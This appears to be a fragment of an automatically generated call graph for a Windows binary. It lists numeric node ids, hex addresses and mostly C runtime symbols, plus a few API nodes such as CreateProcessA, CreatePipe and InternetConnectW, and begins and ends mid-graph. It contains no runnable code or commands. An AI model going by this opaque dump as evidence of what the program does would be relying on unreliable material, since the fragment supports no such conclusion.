__FrameHandler3::FrameUnwindToState 112434->112435 112436 a6540c 112435->112436 112438 a65438 112435->112438 112437 a659b3 __Stoulx 20 API calls 112436->112437 112439 a65411 112437->112439 112443 a6541c __wsopen_s 112438->112443 112485 a61afd EnterCriticalSection 112438->112485 112501 a65122 26 API calls __wsopen_s 112439->112501 112442 a6544b 112486 a642f5 112442->112486 112443->111035 112445 a6547e 112502 a654af LeaveCriticalSection __fread_nolock 112445->112502 112448 a65457 112448->112445 112494 a64e1a 112448->112494 112450 9e1950 112449->112450 112450->112450 112451 9e1967 SimpleUString::operator= 112450->112451 112505 9ebba0 28 API calls 5 library calls 112450->112505 112451->111035 112453 9e19a2 112453->111035 112455 a64d0b __FrameHandler3::FrameUnwindToState 112454->112455 112456 a64d31 112455->112456 112457 a64d19 112455->112457 112506 a6c20b EnterCriticalSection 112456->112506 112458 a659b3 __Stoulx 20 API calls 112457->112458 112460 a64d1e 112458->112460 112542 a65122 26 API calls __wsopen_s 112460->112542 112461 a64d3e 112507 a64c8c 112461->112507 112465 a64d50 112468 a659b3 __Stoulx 20 API calls 112465->112468 112466 a64d5d 112513 a61daa 112466->112513 112484 a64d55 112468->112484 112469 a64d63 112471 a659b3 __Stoulx 20 API calls 112469->112471 112470 a64d29 __wsopen_s 112470->111033 112473 a64d72 112471->112473 112474 a659b3 __Stoulx 20 API calls 112473->112474 112475 a64d79 112474->112475 112526 a76c52 112475->112526 112478 a64da6 112479 a659b3 __Stoulx 20 API calls 112478->112479 112479->112484 112480 a659b3 __Stoulx 20 API calls 112481 a64d98 112480->112481 112481->112478 112482 a64d9d 112481->112482 112483 a659b3 __Stoulx 20 API calls 112482->112483 112483->112484 112543 a64dca LeaveCriticalSection std::_Lockit::~_Lockit 112484->112543 112485->112442 112487 a64308 112486->112487 112493 a6436e 112486->112493 112488 a736a5 __fread_nolock 26 API calls 112487->112488 112489 a6430e 112488->112489 112490 a659b3 __Stoulx 20 API calls 112489->112490 112489->112493 112491 a64363 112490->112491 112503 a65122 26 API calls __wsopen_s 112491->112503 112493->112448 112495 a64dde 112494->112495 112496 a64dff __fread_nolock 112495->112496 112497 a659b3 __Stoulx 20 API calls 112495->112497 112496->112448 112498 a64def 112497->112498 112504 a65122 26 API calls __wsopen_s 112498->112504 112500 a64dfa 112500->112448 112501->112443 112502->112443 112503->112493 112504->112500 112505->112453 112506->112461 112509 a64cab 112507->112509 112508 a64cba 112508->112465 112508->112466 112509->112508 112544 a76866 29 API calls 3 library calls 112509->112544 112511 a64cd5 112512 a74d66 _free 20 API calls 112511->112512 112512->112508 112514 a61db6 __FrameHandler3::FrameUnwindToState 112513->112514 112515 a61dc7 112514->112515 112516 a61ddc 112514->112516 112517 a659b3 __Stoulx 20 API calls 112515->112517 112525 a61dd7 std::_Xfsopen __wsopen_s 112516->112525 112545 a61afd EnterCriticalSection 112516->112545 112518 a61dcc 112517->112518 112562 a65122 26 API calls __wsopen_s 112518->112562 112521 a61df8 112546 a61d34 112521->112546 112523 a61e03 112563 a61e20 LeaveCriticalSection __fread_nolock 112523->112563 112525->112469 112527 a76c65 112526->112527 112528 a76cdc 112527->112528 112529 a76c73 WaitForSingleObject 112527->112529 112530 a659b3 __Stoulx 20 API calls 112528->112530 112532 a76c7f GetExitCodeProcess 112529->112532 112533 a76c9b GetLastError 112529->112533 112531 a64d8c 112530->112531 112531->112478 112531->112480 112532->112533 112536 a76c8e 112532->112536 112534 a76ca6 112533->112534 112535 a76cbe 112533->112535 112537 a659b3 __Stoulx 20 API calls 112534->112537 112729 a6597d 20 API calls 3 library calls 112535->112729 112536->112531 112541 a76cd1 CloseHandle 112536->112541 112539 a76cab 112537->112539 112540 a659a0 __dosmaperr 20 API calls 112539->112540 112540->112536 112541->112531 112542->112470 112543->112470 112544->112511 112545->112521 112547 a61d41 112546->112547 112549 a61d56 112546->112549 112548 a659b3 __Stoulx 20 API calls 112547->112548 112550 a61d46 112548->112550 112554 a61d51 std::_Xfsopen 112549->112554 112564 a61b25 112549->112564 112589 a65122 26 API calls __wsopen_s 112550->112589 112554->112523 112557 a736a5 __fread_nolock 26 API calls 112558 a61d78 112557->112558 112574 a758de 112558->112574 112561 a74d66 _free 20 API calls 112561->112554 112562->112525 112563->112525 112565 a61b3d 112564->112565 112566 a61b39 112564->112566 112565->112566 112567 a736a5 __fread_nolock 26 API calls 112565->112567 112570 a74e40 112566->112570 112568 a61b5d 112567->112568 112590 a7553d 112568->112590 112571 a74e56 112570->112571 112572 a61d72 112570->112572 112571->112572 112573 a74d66 _free 20 API calls 112571->112573 112572->112557 112573->112572 112575 a75902 112574->112575 112576 a758ed 112574->112576 112577 a7593d 112575->112577 112581 a75929 112575->112581 112578 a659a0 __dosmaperr 20 API calls 112576->112578 112579 a659a0 __dosmaperr 20 API calls 112577->112579 112580 a758f2 112578->112580 112582 a75942 112579->112582 112583 a659b3 __Stoulx 20 API calls 112580->112583 112712 a758b6 112581->112712 112585 a659b3 __Stoulx 20 API calls 112582->112585 112587 a61d7e 112583->112587 112586 a7594a 112585->112586 112715 a65122 26 API calls __wsopen_s 112586->112715 112587->112554 112587->112561 112589->112554 112591 a75549 __FrameHandler3::FrameUnwindToState 112590->112591 112592 a75551 112591->112592 112593 a75569 112591->112593 112595 a659a0 __dosmaperr 20 API calls 112592->112595 112594 a75607 112593->112594 112599 a7559e 112593->112599 112596 a659a0 __dosmaperr 20 API calls 112594->112596 112597 a75556 112595->112597 112598 a7560c 112596->112598 112600 a659b3 __Stoulx 20 API calls 112597->112600 112601 a659b3 __Stoulx 20 API calls 112598->112601 112615 a7cba4 EnterCriticalSection 112599->112615 112608 a7555e __wsopen_s 112600->112608 112603 a75614 112601->112603 112670 a65122 26 API calls __wsopen_s 112603->112670 112604 a755a4 112606 a755d5 112604->112606 112607 a755c0 112604->112607 112616 a75628 112606->112616 112609 a659b3 __Stoulx 20 API calls 112607->112609 112608->112566 112611 a755c5 112609->112611 112613 a659a0 __dosmaperr 20 API calls 112611->112613 112612 a755d0 112669 a755ff LeaveCriticalSection __wsopen_s 112612->112669 112613->112612 112615->112604 112617 a75656 112616->112617 112618 a7564f 112616->112618 112619 a7565a 112617->112619 112620 a75679 112617->112620 112621 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 112618->112621 112622 a659a0 __dosmaperr 20 API calls 112619->112622 112623 a756ca 112620->112623 112624 a756ad 112620->112624 112625 a75830 112621->112625 112626 a7565f 112622->112626 112628 a756e0 112623->112628 112632 a78ff6 __fread_nolock 28 API calls 112623->112632 112627 a659a0 __dosmaperr 20 API calls 112624->112627 112625->112612 112629 a659b3 __Stoulx 20 API calls 112626->112629 112631 a756b2 112627->112631 112671 a751cd 112628->112671 112633 a75666 112629->112633 112635 a659b3 __Stoulx 20 API calls 112631->112635 112632->112628 112685 a65122 26 API calls __wsopen_s 112633->112685 112639 a756ba 112635->112639 112637 a75727 112642 a75781 WriteFile 112637->112642 112643 a7573b 112637->112643 112638 a756ee 112640 a75714 112638->112640 112644 a756f2 112638->112644 112686 a65122 26 API calls __wsopen_s 112639->112686 112688 a74fad 71 API calls 3 library calls 112640->112688 112647 a757a4 GetLastError 112642->112647 112652 a7570a 112642->112652 112648 a75743 112643->112648 112649 a75771 112643->112649 112645 a757e8 112644->112645 112687 a75160 GetLastError WriteConsoleW CreateFileW __wsopen_s 112644->112687 112645->112618 112657 a659b3 __Stoulx 20 API calls 112645->112657 112647->112652 112653 a75761 112648->112653 112654 a75748 112648->112654 112678 a75243 112649->112678 112652->112618 112652->112645 112661 a757c4 112652->112661 112690 a75410 8 API calls 2 library calls 112653->112690 112654->112645 112655 a75751 112654->112655 112689 a75322 7 API calls 2 library calls 112655->112689 112660 a7580d 112657->112660 112659 a7575f 112659->112652 112662 a659a0 __dosmaperr 20 API calls 112660->112662 112663 a757df 112661->112663 112664 a757cb 112661->112664 112662->112618 112691 a6597d 20 API calls 3 library calls 112663->112691 112665 a659b3 __Stoulx 20 API calls 112664->112665 112667 a757d0 112665->112667 112668 a659a0 __dosmaperr 20 API calls 112667->112668 112668->112618 112669->112608 112670->112608 112672 a7fc47 __fread_nolock 26 API calls 112671->112672 112673 a751dd 112672->112673 112674 a751e2 112673->112674 112692 a7437a GetLastError 112673->112692 112674->112637 112674->112638 112676 a75205 112676->112674 112677 a75223 GetConsoleMode 112676->112677 112677->112674 112679 a75252 __wsopen_s 112678->112679 112680 a75305 112679->112680 112682 a752c4 WriteFile 112679->112682 112681 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 112680->112681 112684 a7531e 112681->112684 112682->112679 112683 a75307 GetLastError 112682->112683 112683->112680 112684->112652 112685->112618 112686->112618 112687->112652 112688->112652 112689->112659 112690->112659 112691->112618 112693 a74390 112692->112693 112694 a74396 112692->112694 112695 a72fe9 __Getctype 11 API calls 112693->112695 112696 a74d09 __Getctype 20 API calls 112694->112696 112698 a743e5 SetLastError 112694->112698 112695->112694 112697 a743a8 112696->112697 112699 a7303f __Getctype 11 API calls 112697->112699 112704 a743b0 112697->112704 112698->112676 112701 a743c5 112699->112701 112700 a74d66 _free 20 API calls 112702 a743b6 112700->112702 112703 a743cc 112701->112703 112701->112704 112705 a743f1 SetLastError 112702->112705 112706 a741ec __Getctype 20 API calls 112703->112706 112704->112700 112708 a6ca79 _abort 61 API calls 112705->112708 112707 a743d7 112706->112707 112709 a74d66 _free 20 API calls 112707->112709 112710 a743fd 112708->112710 112711 a743de 112709->112711 112711->112698 112711->112705 112716 a75834 112712->112716 112714 a758da 112714->112587 112715->112587 112717 a75840 __FrameHandler3::FrameUnwindToState 112716->112717 112727 a7cba4 EnterCriticalSection 112717->112727 112719 a7584e 112720 a75875 112719->112720 112721 a75880 112719->112721 112723 a7595d __wsopen_s 29 API calls 112720->112723 112722 a659b3 __Stoulx 20 API calls 112721->112722 112724 a7587b 112722->112724 112723->112724 112728 a758aa LeaveCriticalSection __wsopen_s 112724->112728 112726 a7589d __wsopen_s 112726->112714 112727->112719 112728->112726 112729->112536 112730->111043 112732 9ee176 112731->112732 112733 9ee227 112731->112733 112738 9ee188 SimpleUString::operator= codecvt 112732->112738 112739 9ef7d0 28 API calls 5 library calls 112732->112739 112740 9e8080 28 API calls SimpleUString::operator= 112733->112740 112735 9ee22c 112737 9ee220 112737->111048 112738->111048 112739->112737 112740->112735 112742 9e1c10 _MREFOpen@16 28 API calls 112741->112742 112743 9c1c1b 112742->112743 112744 9b7fe0 28 API calls 112743->112744 112745 9c1c8f 112744->112745 112827 9e1440 112745->112827 112747 9c1cdf 112748 9c1d07 SimpleUString::operator= 112747->112748 112878 9ebba0 28 API calls 5 library calls 112747->112878 112750 9e1940 28 API calls 112748->112750 112751 9c1d64 ListArray ctype 112750->112751 112752 9c2762 112751->112752 112839 9c2780 112751->112839 112753 a65132 messages 26 API calls 112752->112753 112756 9c2767 112753->112756 112758 a65132 messages 26 API calls 112756->112758 112760 9c276c 112758->112760 112759 9c1df0 ListArray 112763 a4089a ListArray 22 API calls 112759->112763 112761 a65132 messages 26 API calls 112760->112761 112762 9c2771 112761->112762 112880 9e8080 28 API calls SimpleUString::operator= 112762->112880 112765 9c1e0a 112763->112765 112767 9f4760 28 API calls 112765->112767 112766 9c2776 112768 9c1e28 112767->112768 112849 9fb730 112768->112849 112770 9c1e5b ListArray 112771 a4089a ListArray 22 API calls 112770->112771 112772 9c1e76 112771->112772 112773 9f4760 28 API calls 112772->112773 112774 9c1e9b 112773->112774 112775 9b76c0 30 API calls 112774->112775 112776 9c1ecd 112775->112776 112777 9e1800 collate 28 API calls 112776->112777 112778 9c1ee0 112777->112778 112779 9b7fe0 28 API calls 112778->112779 112780 9c1ef1 ctype 112779->112780 112780->112756 112781 9c25c8 112780->112781 112782 9c1fc6 112780->112782 112783 9e1800 collate 28 API calls 112781->112783 112782->112762 112784 9b7fe0 28 API calls 112782->112784 112816 9c2289 ctype 112783->112816 112785 9c1fee 112784->112785 112786 9e1440 _MREFOpen@16 28 API calls 112785->112786 112787 9c2044 112786->112787 112788 9c206c SimpleUString::operator= 112787->112788 112879 9ebba0 28 API calls 5 library calls 112787->112879 112790 9e1940 28 API calls 112788->112790 112793 9c20c9 ListArray ctype 112790->112793 112791 9c275d 112792 a65132 messages 26 API calls 112791->112792 112792->112752 112793->112760 112795 9c2780 30 API calls 112793->112795 112794 9c253f ctype 112796 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 112794->112796 112797 9c213a 112795->112797 112798 9c2562 112796->112798 112799 9f6b40 30 API calls 112797->112799 112798->111067 112800 9c2155 ListArray 112799->112800 112801 a4089a ListArray 22 API calls 112800->112801 112802 9c216f 112801->112802 112803 9f4760 28 API calls 112802->112803 112804 9c218d 112803->112804 112805 9fb730 30 API calls 112804->112805 112806 9c21c0 ListArray 112805->112806 112807 a4089a ListArray 22 API calls 112806->112807 112808 9c21db 112807->112808 112809 9f4760 28 API calls 112808->112809 112810 9c2200 112809->112810 112811 9b76c0 30 API calls 112810->112811 112812 9c2232 112811->112812 112813 9b7fe0 28 API calls 112812->112813 112814 9c2247 112813->112814 112815 9e1800 collate 28 API calls 112814->112815 112814->112816 112815->112816 112816->112762 112816->112791 112816->112794 112820 9e6c3e SimpleUString::operator= 112817->112820 112821 9e6c70 112817->112821 112818 9e6d2f 112974 9edba0 28 API calls SimpleUString::operator= 112818->112974 112820->111091 112821->112818 112962 9e7510 112821->112962 112824 9e6cc3 codecvt 112825 9e6d0e ctype 112824->112825 112826 a65132 messages 26 API calls 112824->112826 112825->111091 112826->112818 112830 9e145b 112827->112830 112837 9e154b codecvt ctype 112827->112837 112828 9e15d8 112881 9edba0 28 API calls SimpleUString::operator= 112828->112881 112830->112828 112832 9e14dd codecvt 112830->112832 112833 9e14cc 112830->112833 112834 9e14f6 112830->112834 112830->112837 112832->112837 112838 a65132 messages 26 API calls 112832->112838 112835 a4089a ListArray 22 API calls 112833->112835 112834->112832 112836 a4089a ListArray 22 API calls 112834->112836 112835->112832 112836->112832 112837->112747 112838->112828 112882 9bca90 112839->112882 112842 9f4760 28 API calls 112843 9c27e0 112842->112843 112844 9e6670 30 API calls 112843->112844 112845 9c1dd5 112844->112845 112846 9f6b40 112845->112846 112891 9e9900 112846->112891 112848 9f6bac 112848->112759 112903 9fbce0 112849->112903 112852 a4089a ListArray 22 API calls 112853 9fb799 112852->112853 112854 9fb7b2 112853->112854 112855 9f4760 28 API calls 112853->112855 112856 9fbce0 28 API calls 112854->112856 112855->112854 112857 9fb7ea 112856->112857 112906 9fb540 112857->112906 112859 9fb849 112909 9fb480 112859->112909 112863 9fb88f 112864 a4089a ListArray 22 API calls 112863->112864 112865 9fb8b2 112864->112865 112866 9fb8cb 112865->112866 112867 9f4760 28 API calls 112865->112867 112926 9fc430 112866->112926 112867->112866 112869 9fb8ff 112947 9fb600 112869->112947 112871 9fb917 112872 9fb540 22 API calls 112871->112872 112873 9fb933 112872->112873 112874 9fb480 22 API calls 112873->112874 112875 9fb943 112874->112875 112876 9fd680 30 API calls 112875->112876 112877 9fb94b 112876->112877 112877->112770 112878->112748 112879->112788 112880->112766 112883 9f4760 28 API calls 112882->112883 112884 9bcac7 112883->112884 112885 9f4760 28 API calls 112884->112885 112886 9bcad1 112885->112886 112887 9f4760 28 API calls 112886->112887 112888 9bcb35 112887->112888 112889 9f4760 28 API calls 112888->112889 112890 9bcb74 112889->112890 112890->112842 112892 9e993f 112891->112892 112893 a4089a ListArray 22 API calls 112892->112893 112894 9e994f ListArray 112893->112894 112895 9e99b8 112894->112895 112901 a17f30 24 API calls 4 library calls 112894->112901 112898 9e99da 112895->112898 112902 9b2140 26 API calls 4 library calls 112895->112902 112899 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 112898->112899 112900 9e9a5b 112899->112900 112900->112848 112901->112895 112902->112898 112904 9f4760 28 API calls 112903->112904 112905 9fb77e 112904->112905 112905->112852 112907 a4089a ListArray 22 API calls 112906->112907 112908 9fb56f 112907->112908 112908->112859 112910 a4089a ListArray 22 API calls 112909->112910 112911 9fb4b2 112910->112911 112912 9fd680 112911->112912 112913 9fd6c7 112912->112913 112914 9fd706 112913->112914 112917 9fd6d9 112913->112917 112915 9e1bd0 _MREFOpen@16 28 API calls 112914->112915 112916 9fd713 112915->112916 112955 9b5930 28 API calls _MREFOpen@16 112916->112955 112951 9fe9e0 112917->112951 112921 9fd726 112956 a57e0c RaiseException 112921->112956 112922 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 112924 9fd700 112922->112924 112924->112863 112925 9fd734 112925->112863 112927 9fbce0 28 API calls 112926->112927 112928 9fc46d 112927->112928 112958 a58eeb RaiseException 6 library calls 112928->112958 112930 9fc4ca 112931 9fc577 112930->112931 112937 9fc4db 112930->112937 112932 9e1bd0 _MREFOpen@16 28 API calls 112931->112932 112933 9fc584 112932->112933 112959 9b5930 28 API calls _MREFOpen@16 112933->112959 112935 9fc594 112960 a57e0c RaiseException 112935->112960 112939 9fb600 22 API calls 112937->112939 112938 9fc5a2 112961 9f3100 26 API calls 2 library calls 112938->112961 112941 9fc538 112939->112941 112943 9fd680 30 API calls 112941->112943 112942 9fc5df ctype 112942->112869 112944 9fc547 112943->112944 112945 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 112944->112945 112946 9fc571 112945->112946 112946->112869 112948 9fb630 112947->112948 112949 a4089a ListArray 22 API calls 112948->112949 112950 9fb640 112949->112950 112950->112871 112952 9fe9fc 112951->112952 112953 9fd6e4 112951->112953 112952->112953 112957 a17f30 24 API calls 4 library calls 112952->112957 112953->112922 112955->112921 112956->112925 112957->112953 112958->112930 112959->112935 112960->112938 112961->112942 112963 9e7525 112962->112963 112964 9e7520 112962->112964 112963->112964 112965 9e7554 112963->112965 112966 a4089a ListArray 22 API calls 112964->112966 112967 9e7565 112965->112967 112969 a4089a ListArray 22 API calls 112965->112969 112968 9e753e 112966->112968 112967->112824 112970 9e7547 112968->112970 112972 a65132 messages 26 API calls 112968->112972 112971 9e755e 112969->112971 112970->112824 112971->112824 112973 9e7570 112972->112973 114096 a736cb 114097 a736a5 __fread_nolock 26 API calls 114096->114097 114098 a736d9 114097->114098 114099 a736e7 114098->114099 114100 a73706 114098->114100 114102 a659b3 __Stoulx 20 API calls 114099->114102 114101 a73713 114100->114101 114105 a73720 114100->114105 114103 a659b3 __Stoulx 20 API calls 114101->114103 114106 a736ec 114102->114106 114103->114106 114105->114106 114107 a7fc47 __fread_nolock 26 API calls 114105->114107 114108 a737a3 114105->114108 114109 a737b0 114105->114109 114107->114108 114108->114109 114110 a75b37 21 API calls 114108->114110 114111 a738f1 114109->114111 114110->114109 114112 a736a5 __fread_nolock 26 API calls 114111->114112 114113 a73900 114112->114113 114114 a739a4 114113->114114 114115 a73912 114113->114115 114116 a7553d __wsopen_s 88 API calls 114114->114116 114117 a7392f 114115->114117 114119 a73955 114115->114119 114120 a7393c 114116->114120 114118 a7553d __wsopen_s 88 API calls 114117->114118 114118->114120 114119->114120 114122 a78fdb 114119->114122 114120->114106 114125 a78e58 114122->114125 114124 a78ff1 114124->114120 114126 a78e64 __FrameHandler3::FrameUnwindToState 114125->114126 114127 a78e84 114126->114127 114128 a78e6c 114126->114128 114129 a78f38 114127->114129 114133 a78ebc 114127->114133 114130 a659a0 __dosmaperr 20 API calls 114128->114130 114131 a659a0 __dosmaperr 20 API calls 114129->114131 114132 a78e71 114130->114132 114134 a78f3d 114131->114134 114135 a659b3 __Stoulx 20 API calls 114132->114135 114150 a7cba4 EnterCriticalSection 114133->114150 114137 a659b3 __Stoulx 20 API calls 114134->114137 114146 a78e79 __wsopen_s 114135->114146 114139 a78f45 114137->114139 114138 a78ec2 114140 a78ee6 114138->114140 114141 a78efb 114138->114141 114152 a65122 26 API calls __wsopen_s 114139->114152 114143 a659b3 __Stoulx 20 API calls 114140->114143 114144 a78f5d __fread_nolock 28 API calls 114141->114144 114145 a78eeb 114143->114145 114147 a78ef6 114144->114147 114148 a659a0 __dosmaperr 20 API calls 114145->114148 114146->114124 114151 a78f30 LeaveCriticalSection __wsopen_s 114147->114151 114148->114147 114150->114138 114151->114146 114152->114146 114153 a6470a 114154 a64716 __FrameHandler3::FrameUnwindToState 114153->114154 114155 a64722 114154->114155 114156 a64745 114154->114156 114157 a659b3 __Stoulx 20 API calls 114155->114157 114176 a64a75 114156->114176 114159 a64727 114157->114159 114283 a65122 26 API calls __wsopen_s 114159->114283 114162 a64732 __wsopen_s 114164 a6478f 114164->114162 114245 a6c20b EnterCriticalSection 114164->114245 114166 a647be 114167 a659b3 __Stoulx 20 API calls 114166->114167 114168 a647c8 114167->114168 114246 a64832 GetCurrentProcess DuplicateHandle 114168->114246 114171 a659b3 __Stoulx 20 API calls 114174 a647e8 114171->114174 114172 a64812 114284 a64829 LeaveCriticalSection std::_Lockit::~_Lockit 114172->114284 114174->114172 114175 a758de Concurrency::details::_CancellationTokenState::_RegisterCallback 31 API calls 114174->114175 114175->114174 114177 a64a8b 114176->114177 114178 a659b3 __Stoulx 20 API calls 114177->114178 114179 a64751 114177->114179 114180 a64aa0 114178->114180 114179->114162 114182 a76eb7 114179->114182 114285 a65122 26 API calls __wsopen_s 114180->114285 114183 a76ec3 __FrameHandler3::FrameUnwindToState 114182->114183 114184 a76ef2 114183->114184 114185 a76ed1 114183->114185 114186 a76f0d 114184->114186 114190 a76f3d CreatePipe 114184->114190 114187 a659a0 __dosmaperr 20 API calls 114185->114187 114188 a659a0 __dosmaperr 20 API calls 114186->114188 114189 a76ed6 114187->114189 114191 a76f12 114188->114191 114192 a659b3 __Stoulx 20 API calls 114189->114192 114193 a76f6f GetLastError 114190->114193 114194 a76f7e 114190->114194 114197 a659b3 __Stoulx 20 API calls 114191->114197 114198 a76ede 114192->114198 114288 a6597d 20 API calls 3 library calls 114193->114288 114196 a7cc7e __wsopen_s 24 API calls 114194->114196 114200 a76f83 114196->114200 114201 a76f1a 114197->114201 114286 a65122 26 API calls __wsopen_s 114198->114286 114202 a76f8c 114200->114202 114289 a77023 LeaveCriticalSection __wsopen_s 114200->114289 114287 a65122 26 API calls __wsopen_s 114201->114287 114204 a659b3 __Stoulx 20 API calls 114202->114204 114206 a76f91 114204->114206 114209 a659a0 __dosmaperr 20 API calls 114206->114209 114207 a76ff4 114210 a7cc7e __wsopen_s 24 API calls 114207->114210 114208 a76ee9 __wsopen_s 114208->114164 114211 a76f9c CloseHandle CloseHandle 114209->114211 114212 a76ff9 114210->114212 114211->114208 114212->114202 114213 a7702b 114212->114213 114290 a77133 LeaveCriticalSection __wsopen_s 114213->114290 114215 a77071 114291 a7046e 26 API calls 2 library calls 114215->114291 114217 a7707d 114218 a7713b 114217->114218 114220 a77086 114217->114220 114292 a6514f 11 API calls _abort 114218->114292 114221 a7cbc7 __wsopen_s 21 API calls 114220->114221 114223 a77110 114221->114223 114222 a77145 __FrameHandler3::FrameUnwindToState 114224 a7716e 114222->114224 114225 a7715e 114222->114225 114226 a7cbc7 __wsopen_s 21 API calls 114223->114226 114227 a77186 114224->114227 114228 a77176 114224->114228 114229 a659b3 __Stoulx 20 API calls 114225->114229 114226->114208 114231 a77226 114227->114231 114234 a771b8 114227->114234 114230 a659b3 __Stoulx 20 API calls 114228->114230 114232 a77163 114229->114232 114238 a7717b __wsopen_s 114230->114238 114233 a659b3 __Stoulx 20 API calls 114231->114233 114294 a65122 26 API calls __wsopen_s 114232->114294 114233->114232 114236 a74680 71 API calls 114234->114236 114237 a771c4 114236->114237 114237->114238 114239 a74523 std::_Xfsopen 23 API calls 114237->114239 114238->114164 114240 a771dd 114239->114240 114241 a771e5 114240->114241 114242 a771f2 114240->114242 114244 a659b3 __Stoulx 20 API calls 114241->114244 114293 a7721c LeaveCriticalSection __fread_nolock 114242->114293 114244->114238 114245->114166 114247 a64882 114246->114247 114248 a6487b 114246->114248 114249 a758de Concurrency::details::_CancellationTokenState::_RegisterCallback 31 API calls 114247->114249 114251 a64a56 CloseHandle 114248->114251 114252 a647db 114248->114252 114250 a64889 114249->114250 114295 a7723e 114250->114295 114251->114252 114252->114171 114254 a64897 114254->114248 114255 a64c8c 29 API calls 114254->114255 114256 a648a7 114255->114256 114257 a648b1 114256->114257 114317 a64acb 114256->114317 114257->114248 114259 a61daa Concurrency::details::_CancellationTokenState::_RegisterCallback 93 API calls 114257->114259 114259->114248 114260 a648bd ListArray 114260->114260 114261 a74d09 __Getctype 20 API calls 114260->114261 114262 a6495b 114261->114262 114263 a721c2 ___std_type_info_name 26 API calls 114262->114263 114282 a64a22 114262->114282 114264 a64974 114263->114264 114266 a64a68 114264->114266 114268 a76be9 26 API calls 114264->114268 114265 a74d66 _free 20 API calls 114267 a64a2d 114265->114267 114343 a6514f 11 API calls _abort 114266->114343 114269 a74d66 _free 20 API calls 114267->114269 114272 a6498b 114268->114272 114269->114257 114271 a64a74 114272->114266 114273 a76be9 26 API calls 114272->114273 114274 a649a0 114273->114274 114274->114266 114275 a649ab 114274->114275 114324 a64b09 114275->114324 114278 a649bb CreateProcessA 114279 a64a00 CloseHandle 114278->114279 114280 a649f9 114278->114280 114279->114280 114281 a74d66 _free 20 API calls 114280->114281 114281->114282 114282->114265 114283->114162 114284->114162 114285->114179 114286->114208 114287->114208 114288->114208 114289->114207 114290->114215 114291->114217 114292->114222 114293->114238 114294->114238 114296 a77146 __FrameHandler3::FrameUnwindToState 114295->114296 114297 a7716e 114296->114297 114298 a7715e 114296->114298 114299 a77176 114297->114299 114303 a77186 114297->114303 114300 a659b3 __Stoulx 20 API calls 114298->114300 114301 a659b3 __Stoulx 20 API calls 114299->114301 114304 a77163 114300->114304 114310 a7717b __wsopen_s 114301->114310 114302 a77226 114305 a659b3 __Stoulx 20 API calls 114302->114305 114303->114302 114306 a771b8 114303->114306 114345 a65122 26 API calls __wsopen_s 114304->114345 114305->114304 114308 a74680 71 API calls 114306->114308 114309 a771c4 114308->114309 114309->114310 114311 a74523 std::_Xfsopen 23 API calls 114309->114311 114310->114254 114312 a771dd 114311->114312 114313 a771e5 114312->114313 114314 a771f2 114312->114314 114316 a659b3 __Stoulx 20 API calls 114313->114316 114344 a7721c LeaveCriticalSection __fread_nolock 114314->114344 114316->114310 114318 a76b4b 77 API calls 114317->114318 114319 a64ae6 114318->114319 114320 a64af2 114319->114320 114321 a64afe 114319->114321 114320->114260 114346 a6514f 11 API calls _abort 114321->114346 114323 a64b08 114325 a76e62 33 API calls 114324->114325 114326 a64b1c 114325->114326 114327 a649b4 114326->114327 114328 a74d09 __Getctype 20 API calls 114326->114328 114327->114278 114327->114282 114329 a64b37 114328->114329 114330 a64bef 114329->114330 114347 a64c0b 77 API calls std::_Locinfo::_W_Getdays 114329->114347 114331 a74d66 _free 20 API calls 114330->114331 114331->114327 114334 a64be1 114336 a74d66 _free 20 API calls 114334->114336 114336->114330 114337 a64c00 114350 a6514f 11 API calls _abort 114337->114350 114339 a64c0a 114340 a76be9 26 API calls 114341 a64b49 114340->114341 114341->114334 114341->114337 114341->114340 114342 a76e62 33 API calls 114341->114342 114348 a64c49 64 API calls 114341->114348 114349 a76cf0 20 API calls __Stoulx 114341->114349 114342->114341 114343->114271 114344->114310 114345->114310 114346->114323 114347->114341 114348->114341 114349->114341 114350->114339 114351 9c6330 114367 9e6950 28 API calls 4 library calls 114351->114367 114353 9c634f 114353->114351 114358 9c6355 114353->114358 114354 9c63d1 InternetConnectW 114355 9c6402 114354->114355 114357 9e1800 collate 28 API calls 114355->114357 114361 9c62ad ctype 114357->114361 114358->114354 114359 9c63c5 114358->114359 114368 9e6950 28 API calls 4 library calls 114358->114368 114359->114354 114360 9c69cd 114362 a65132 messages 26 API calls 114360->114362 114361->114360 114366 9c62fb ctype 114361->114366 114364 9c69d2 114362->114364 114363 a405bb __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 114365 9c66b2 114363->114365 114366->114363 114367->114353 114368->114358 114369 a74b7b 114374 a748b2 114369->114374 114372 a74ba3 114379 a748e3 try_get_first_available_module 114374->114379 114375 a659b3 __Stoulx 20 API calls 114376 a74ae2 114375->114376 114392 a65122 26 API calls __wsopen_s 114376->114392 114378 a74a37 114378->114372 114386 a809b9 114378->114386 114385 a74a2c 114379->114385 114389 a7fc9d 66 API calls 2 library calls 114379->114389 114381 a74a80 114381->114385 114390 a7fc9d 66 API calls 2 library calls 114381->114390 114383 a74a9f 114383->114385 114391 a7fc9d 66 API calls 2 library calls 114383->114391 114385->114375 114385->114378 114393 a80045 114386->114393 114388 a809d4 114388->114372 114389->114381 114390->114383 114391->114385 114392->114378 114394 a80051 __FrameHandler3::FrameUnwindToState 114393->114394 114395 a8005f 114394->114395 114397 a80098 114394->114397 114396 a659b3 __Stoulx 20 API calls 114395->114396 114398 a80064 114396->114398 114400 a80690 __wsopen_s 113 API calls 114397->114400 114404 a65122 26 API calls __wsopen_s 114398->114404 114401 a800bc 114400->114401 114405 a800e5 LeaveCriticalSection __wsopen_s 114401->114405 114403 a8006e __wsopen_s 114403->114388 114404->114403 114405->114403 114406 9dbd00 114407 9e1800 collate 28 API calls 114406->114407 114408 9dbd9b 